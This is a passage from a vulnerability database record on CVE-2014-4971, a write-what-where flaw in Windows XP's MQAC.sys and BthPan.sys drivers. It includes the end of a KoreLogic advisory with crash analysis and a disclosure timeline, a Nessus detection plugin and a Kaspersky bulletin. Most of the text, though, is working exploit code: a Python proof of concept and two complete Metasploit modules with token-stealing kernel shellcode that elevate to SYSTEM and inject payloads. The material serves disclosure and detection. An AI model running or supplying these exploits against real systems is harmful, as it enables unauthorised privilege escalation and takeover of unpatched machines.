nt!KeBugCheckEx+0x1b\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the mqac driver.\n\nOLLOWUP_IP: \nmqac!AC2QM+5d\nb230af37 891e mov dword ptr [esi],ebx\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\nErrCode = 00000002\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\nmqac!AC2QM+0x5d:\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in MQAC it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have\n not been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\n have passed since vendor acknowledgement of the\n initial report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft responds to KoreLogic that the\n vulnerability does not affect an \"up-platform\"\n product. Says they are investigating embedded\n platforms. Does not provide a CVE number or a\n disclosure date.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. Also requests that\n a CVE ID be issued to this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\n be identical to KL-001-2014-002 and issues\n CVE-2014-4971 for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. Proof of Concept\n\n #!/usr/bin/python2\n #\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\n # Matt Bergin (KoreLogic / Smash the Stack)\n # CVE-2014-4971\n #\n from ctypes import *\n from struct import pack\n from os import getpid,system\n from sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n\n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them :)\n def getBase(name=None):\n retArray = c_ulong*1024\n ImageBase = retArray()\n callback = c_int(1024)\n cbNeeded = c_long()\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n for base in ImageBase:\n driverName = c_char_p(\"\\x00\"*1024)\n GetDeviceDriverBaseNameA(base,driverName,48)\n if (name):\n if (driverName.value.lower() == name):\n return base\n else:\n return (base,driverName.value)\n return None\n\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\n #Overwrite Pointer\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\n print \"[+] HalDispatchTable+0x4 overwritten\"\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)\n\nThe contents of this advisory are copyright(c) 2014\nKoreLogic, Inc. and are licensed under a Creative Commons\nAttribution Share-Alike 4.0 (United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a\nproven track record of providing security services to entities\nranging from Fortune 500 to small and mid-sized companies. We\nare a highly skilled team of senior security consultants doing\nby-hand security assessments for the most important networks in\nthe U.S. and around the world. We are also developers of various\ntools and resources aimed at helping the security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T23:47:01", "description": "A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process.\n", "published": "2014-07-22T14:04:12", "type": "metasploit", "title": "MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MQAC_WRITE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/local/windows_kernel'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Exploit::Local::WindowsKernel\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',\n 'Description' => %q(\n A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Matt Bergin', # original exploit and all the hard work\n 'Spencer McIntyre' # MSF module\n ],\n 'Arch' => [ARCH_X86],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' =>\n [\n ['Windows XP SP3',\n {\n 'HaliQuerySystemInfo' => 0x16bba,\n '_KPROCESS' => \"\\x44\",\n '_TOKEN' => \"\\xc8\",\n '_UPID' => \"\\x84\",\n '_APLINKS' => \"\\x88\"\n }\n ]\n ],\n 'References' =>\n [\n ['CVE', '2014-4971'],\n ['EDB', '34112'],\n ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']\n ],\n 'DisclosureDate' => '2014-07-22',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n }\n ))\n end\n\n # Function borrowed from smart_hashdump\n def get_system_proc\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\n local_sys = resolve_sid('S-1-5-18')\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\n\n this_pid = session.sys.process.getpid\n # Processes that can Blue Screen a host if migrated in to\n dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']\n session.sys.process.processes.each do |p|\n # Check we are not migrating to a process that can BSOD the host\n next if dangerous_processes.include?(p['name'])\n next if p['pid'] == this_pid\n next if p['pid'] == 4\n next if p['user'] != system_account_name\n return p\n end\n end\n\n def check\n handle = open_device('\\\\\\\\.\\\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n if handle.nil?\n print_error('MSMQ installation not found')\n return Exploit::CheckCode::Safe\n end\n session.railgun.kernel32.CloseHandle(handle)\n\n os = sysinfo['OS']\n case os\n when /windows xp.*service pack 3/i\n return Exploit::CheckCode::Appears\n when /windows xp/i\n vprint_error('Unsupported version of Windows XP detected')\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n if sysinfo['Architecture'] == ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')\n end\n\n if is_system?\n print_error('This meterpreter session is already running as SYSTEM')\n return\n end\n\n # Running on Windows XP versions that aren't listed in the supported list\n # results in a BSOD and so we should not let that happen.\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system\")\n end\n\n base_addr = 0xffff\n handle = open_device('\\\\\\\\.\\\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n return if handle.nil?\n\n this_proc = session.sys.process.open\n unless this_proc.memory.writable?(base_addr)\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,\n [0xffff].pack('V'),\n 'MEM_COMMIT|MEM_RESERVE',\n 'PAGE_EXECUTE_READWRITE')\n end\n unless this_proc.memory.writable?(base_addr)\n print_error('Failed to properly allocate memory')\n this_proc.close\n return\n end\n\n haldispatchtable = find_haldispatchtable\n return if haldispatchtable.nil?\n print_status(\"HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}\")\n\n vprint_status('Getting the hal.dll base address...')\n hal_info = find_sys_base('hal.dll')\n fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?\n hal_base = hal_info[0]\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}\")\n hali_query_system_information = hal_base + target['HaliQuerySystemInfo']\n\n restore_ptrs = \"\\x31\\xc0\" # xor eax, eax\n restore_ptrs << \"\\xb8\" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation\n restore_ptrs << \"\\xa3\" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax\n\n shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)\n\n this_proc.memory.write(0x1, shellcode)\n this_proc.close\n\n print_status('Triggering vulnerable IOCTL')\n session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,\n 1, 0x258,\n haldispatchtable + 4, 0)\n session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)\n\n unless is_system?\n print_error('Did not get system, exploit failed')\n return\n end\n\n proc = get_system_proc\n print_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\")\n unless execute_shellcode(payload.encoded, nil, proc['pid'])\n fail_with(Failure::Unknown, 'Error while executing the payload')\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/mqac_write.rb"}, {"lastseen": "2020-10-07T23:48:48", "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.\n", "published": "2014-07-22T22:17:06", "type": "metasploit", "title": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BTHPAN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/local/windows_kernel'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Exploit::Local::WindowsKernel\n include Msf::Post::File\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',\n 'Description' => %q{\n A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC\n 'Jay Smith <jsmith[at]korelogic.com>' # MSF module\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' =>\n [\n ['Windows XP SP3',\n {\n 'HaliQuerySystemInfo' => 0x16bba,\n '_KPROCESS' => \"\\x44\",\n '_TOKEN' => \"\\xc8\",\n '_UPID' => \"\\x84\",\n '_APLINKS' => \"\\x88\"\n }\n ]\n ],\n 'References' =>\n [\n [ 'MSB', 'MS14-062' ],\n [ 'CVE', '2014-4971' ],\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],\n [ 'OSVDB', '109387' ]\n ],\n 'DisclosureDate' => '2014-07-18',\n 'DefaultTarget' => 0\n ))\n end\n\n\n def ring0_shellcode\n tokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\"\n tokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\"\n tokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\"\n tokenswap << \"\\x00\\x00\\x00\\x2D\\x88\"\n tokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\"\n tokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\"\n tokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\"\n tokenswap << [session.sys.process.getpid].pack('V')\n tokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\"\n tokenswap << \"\\x2D\\x88\\x00\\x00\\x00\"\n tokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\"\n tokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\"\n tokenswap << \"\\x00\\x00\\x00\\x61\\xC3\"\n end\n\n def fill_memory(proc, address, length, content)\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")\n\n unless proc.memory.writable?(address)\n vprint_error(\"Failed to allocate memory\")\n return nil\n end\n vprint_good(\"#{address} is now writable\")\n\n result = proc.memory.write(address, content)\n\n if result.nil?\n vprint_error(\"Failed to write contents to memory\")\n return nil\n end\n vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")\n\n return address\n end\n\n def disclose_addresses(t)\n addresses = {}\n\n hal_dispatch_table = find_haldispatchtable\n return nil if hal_dispatch_table.nil?\n addresses['halDispatchTable'] = hal_dispatch_table\n vprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\")\n\n vprint_status('Getting the hal.dll base address...')\n hal_info = find_sys_base('hal.dll')\n if hal_info.nil?\n vprint_error('Failed to disclose hal.dll base address')\n return nil\n end\n hal_base = hal_info[0]\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\")\n\n hali_query_system_information = hal_base + t['HaliQuerySystemInfo']\n addresses['HaliQuerySystemInfo'] = hali_query_system_information\n\n vprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\")\n addresses\n end\n\n def check\n # covers both native x64 and WOW64\n if sysinfo[\"Architecture\"] == ARCH_X64\n return Exploit::CheckCode::Safe\n end\n\n os = sysinfo[\"OS\"]\n return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i\n\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n return Exploit::CheckCode::Safe unless handle\n\n session.railgun.kernel32.CloseHandle(handle)\n\n return Exploit::CheckCode::Detected\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system\")\n end\n\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n if handle.nil?\n fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\")\n end\n\n my_target = targets[0]\n print_status(\"Disclosing the HalDispatchTable address...\")\n @addresses = disclose_addresses(my_target)\n if @addresses.nil?\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\")\n else\n print_good(\"Address successfully disclosed.\")\n end\n\n print_status(\"Storing the shellcode in memory...\")\n this_proc = session.sys.process.open\n kernel_shell = ring0_shellcode\n kernel_shell_address = 0x1\n\n buf = \"\\x90\" * 0x6000\n buf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400\n buf[0x5000, kernel_shell.length] = kernel_shell\n\n result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)\n if result.nil?\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")\n end\n print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")\n\n print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")\n session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0)\n session.railgun.kernel32.CloseHandle(handle)\n\n print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")\n session.railgun.ntdll.NtQueryIntervalProfile(2, 4)\n\n print_status(\"Checking privileges after exploitation...\")\n\n unless is_system?\n fail_with(Failure::Unknown, \"The privilege escalation wasn't successful\")\n end\n print_good(\"Privilege escalation successful!\")\n\n p = payload.encoded\n print_status(\"Injecting #{p.length} bytes to memory and executing it...\")\n unless execute_shellcode(p)\n fail_with(Failure::Unknown, \"Error while executing the payload\")\n end\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bthpan.rb"}], "nessus": [{"lastseen": "2021-04-01T06:16:02", "description": "The remote Windows host is affected by a privilege escalation\nvulnerability in the Microsoft Message Queuing (MSMQ) service. The\nvulnerability can be exploited if an attacker sends a specially\ncrafted input/output control (IOCTL) request to the Message Queuing\nservice. Successful exploitation of this vulnerability could lead to\nfull access to the affected system.", "edition": 29, "published": "2014-10-15T00:00:00", "title": "MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4971"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS14-062.NASL", "href": "https://www.tenable.com/plugins/nessus/78438", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78438);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2014-4971\");\n script_bugtraq_id(68764);\n script_xref(name:\"EDB-ID\", value:\"34982\");\n script_xref(name:\"MSFT\", value:\"MS14-062\");\n script_xref(name:\"MSKB\", value:\"2993254\");\n script_xref(name:\"IAVA\", value:\"2014-A-0150\");\n\n script_name(english:\"MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254)\");\n script_summary(english:\"Checks presence of MSMQ service / version of Mqqm.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a privilege escalation\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by a privilege escalation\nvulnerability in the Microsoft Message Queuing (MSMQ) service. The\nvulnerability can be exploited if an attacker sends a specially\ncrafted input/output control (IOCTL) request to the Message Queuing\nservice. Successful exploitation of this vulnerability could lead to\nfull access to the affected system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-062\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MQAC.sys Arbitrary Write Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_enum_services.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-062';\nkb = \"2993254\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows Server 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mqqm.dll\", version:\"5.2.2008.5417\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T12:03:35", "bulletinFamily": "info", "cvelist": ["CVE-2014-1814", "CVE-2014-4077", "CVE-2014-6324", "CVE-2014-0254", "CVE-2014-0323", "CVE-2014-1811", "CVE-2014-0266", "CVE-2014-1807", "CVE-2014-6332", "CVE-2014-6322", "CVE-2014-4971", "CVE-2014-0255", "CVE-2014-0296", "CVE-2014-0300", "CVE-2014-0317", "CVE-2014-1767", "CVE-2014-6355", "CVE-2014-4114", "CVE-2014-0316", "CVE-2014-1819", "CVE-2014-4076", "CVE-2014-0318", "CVE-2014-4113", "CVE-2014-6318", "CVE-2014-6532", "CVE-2014-2781", "CVE-2014-0315", "CVE-2014-2780", "CVE-2014-4148", "CVE-2014-1816", "CVE-2014-6352", "CVE-2014-4064", "CVE-2013-5065", "CVE-2014-1824", "CVE-2014-1812", "CVE-2014-0262", "CVE-2014-4115", "CVE-2014-0263", "CVE-2014-4060", "CVE-2014-4118", "CVE-2014-6317", "CVE-2014-0301", "CVE-2014-4074", "CVE-2014-6321", "CVE-2014-0256"], "description": "### *Detect date*:\n11/11/2014\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft products. Malicious users can exploit these vulnerabilities to bypass security restrictions, cause denial of service gain privileges, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nWindows XP Service pack 3 \nWindows XP Professional x64 Service Pack 3 \nWindows Server 2003 x86, x64, Itanium Service Pack 2 \nWindows Vista x86, x64 Service Pack 2 \nWindows Server 2008 x86, x64, Itanium Service Pack 2 \nWindows 7 x86, x64 Service Pack 1 \nWindows Server 2008 R2 x64, Itanium Service Pacl 1 \nWindows 8 x86, x64 \nWindows 8.1 x86, x64 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows RT \nWindows RT 8.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2014-1816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1816>) \n[CVE-2014-6532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6532>) \n[CVE-2014-0266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0266>) \n[CVE-2014-4076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076>) \n[CVE-2014-6321](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321>) \n[CVE-2014-6322](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6322>) \n[CVE-2014-6324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6324>) \n[CVE-2014-1767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1767>) \n[CVE-2014-4077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4077>) \n[CVE-2014-4074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4074>) \n[CVE-2014-1807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1807>) 